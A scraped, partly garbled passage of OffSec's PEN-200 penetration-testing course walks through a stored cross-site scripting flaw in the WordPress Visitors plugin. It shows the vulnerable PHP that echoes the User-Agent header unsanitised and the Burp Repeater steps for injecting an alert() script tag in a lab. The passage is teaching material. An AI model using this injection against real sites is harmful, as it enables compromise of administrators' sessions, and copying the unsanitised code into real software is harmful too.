Penetration Testing with Kali Linux OffSec

'useragent' => $_SERVER['HTTP_USER_AGENT']

səhifə	122/132
tarix	21.12.2023
ölçüsü
	#187693

1 ... 118 119 120 121 122 123 124 125 ... 132

PEN-200

.$record->useragent.

'useragent' => $_SERVER['HTTP_USER_AGENT'],
'ip' => $_SERVER['HTTP_X_FORWARDED_FOR']
)
);
}
367
(Wikipedia, 2022), https://en.wikipedia.org/wiki/Character_encodings_in_HTML#HTML_character_references
368
(Wikipedia, 2022), https://en.wikipedia.org/wiki/Percent-encoding
369
(Mozilla, 2022), https://developer.mozilla.org/en-US/docs/Web/HTML/Element/script
370
(OffSec Services Limited. 2022), https://www.exploit-db.com/exploits/49972
371
(Mozilla, 2022), https://downloads.wordpress.org/plugin/visitors-app.0.3.zip

Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
237
Listing 121 - Inspecting Visitor Plugin Record Creation Function
This PHP function is responsible for parsing various HTTP request headers, including the User-
Agent, which is saved in the
useragent
record value.
Next, each time a WordPress administrator loads the Visitor plugin, the function will execute the
following portion of code from start.php:
$i=count(VST_get_records($date_start, $date_finish));
foreach(VST_get_records($date_start, $date_finish) as $record) {
echo '

';
$i--;
}
Listing 122 - Inspecting Visitors Plugin Record Visualization Function
From the above code, we’ll notice that the
useragent
record value is retrieved from the database
and inserted plainly in the Table Data (
td
) HTML tag, without any sort of data sanitization.
As the User-Agent header is under user control, we could craft an XSS attack by inserting a script
tag invoking the
alert()
method to generate a pop-up message. Given the immediate visual
impact, this method is very commonly used to verify that an application is vulnerable to XSS.
Although we just performed a white-box testing approach, we could have
discovered the same vulnerability by testing the plugin through black-box HTTP
header fuzzing.
With Burp configured as a proxy and Intercept disabled, we can start our attack by first browsing
to http://offsecwp/ using Firefox.
We’ll then go to Burp
Proxy
>
HTTP History
, right-click on the request, and select
Send to Repeater
.

Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
238
Figure 112: Forwarding the request to the Repeater
Moving to the
Repeater
tab, we can replace the default User-Agent value with the a script tag that
includes the alert method (), then send the request.

Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
239
Figure 113: Forwarding the request to the Repeater
If the server responds with a
200 OK
message, we should be confident that our payload is now
stored in the WordPress database.
To verify this, let’s log in to the admin console at http://offsecwp/wp-login.php using the
admin/password
credentials.
If
we
navigate
to
the
Visitors
plugin
console
at
http://offsecwp/wp-
admin/admin.php?page=visitors-app%2Fadmin%2Fstart.php
, we are greeted with a pop-up
banner showing the number 42, proving that our code injection worked.

Penetration Testing with Kali Linux
PWK - Copyright © 2023 OffSec Services Limited. All rights reserved.
240

'.$i.'

'.date_format(date_create($record->datetime),
get_option("links_updated_date_format")).'

'.$record->patch.'

>ip.'#ipresult">'.$record->ip.'

'.$record->useragent.'

Yüklə

Dostları ilə paylaş:

1 ... 118 119 120 121 122 123 124 125 ... 132